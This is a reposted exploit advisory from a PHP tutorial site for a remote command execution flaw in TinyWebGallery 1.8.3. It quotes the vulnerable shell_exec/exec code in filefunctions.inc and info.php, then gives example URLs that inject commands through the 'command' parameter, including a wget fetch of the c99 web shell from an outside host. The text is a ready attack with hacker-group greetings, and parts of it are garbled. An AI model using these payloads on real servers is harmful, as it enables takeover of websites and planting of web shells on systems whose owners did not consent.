来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] ======================================================[raquo;] TinyWebGallery 1.8.3 Remote Command Execution======================================================作者: Expl0!Ts -------......
|
<======================================================>
[»] TinyWebGallery 1.8.3 Remote Command Execution <======================================================> 作者: Expl0!Ts --------> My Best t34m -----> "BaC , RoBert MilEs , Bl4ck_ID" 软件地址: http://www.tinywebgallery.com/dl.php?file=twg_latest 测试平台wind xp !----- > THnKs T0 My ALLAH <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> bIG tHnkS T0 :-> vbspiders.com & Dz4all.com www.2cto.com & isecur1ty.org <::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::> <=================E测试====================> -=[ vuln c0de ]=- 1 1) --------------> filefunctions.inc : function execute_command ($command) { global $use_shell_exec; ob_start(); set_error_handler("on_error_no_output"); i f (substr(@php_uname(), 0, 7) == "Windows"){ // Make a new instance of the COM object $WshShell = new COM("WScript.Shell"); // Make the command window but dont show it. $oExec = $WshShell->Run("cmd /C " . $command, 0, true); } else { if ($use_shell_exec) { shell_exec($command); <--------------------------------------------- error 1) --------->示例: http://www.2cto.com /(patch)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip> -=[ vuln c0de ]=- 2 2) --------------> ifo.php : if ($use_shell_exec) { shell_exec($command); } else { exec($command . " > /dev/null"); <------------------------------------------ error 2) ---------> 示例: http://www.2cto.com /(patch)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip> <-------------------------------------------------------------------------------------------------------------------------------------------------------------------> 致谢: !> BaC ,!> Black_ID ,!> Kala$nikoV ,!> Robert miles ,!> Dr.Black_ID , !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd <-------------------------------------------------------------------------------------------------------------------------------------------------------------------> EnJoY o_O |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
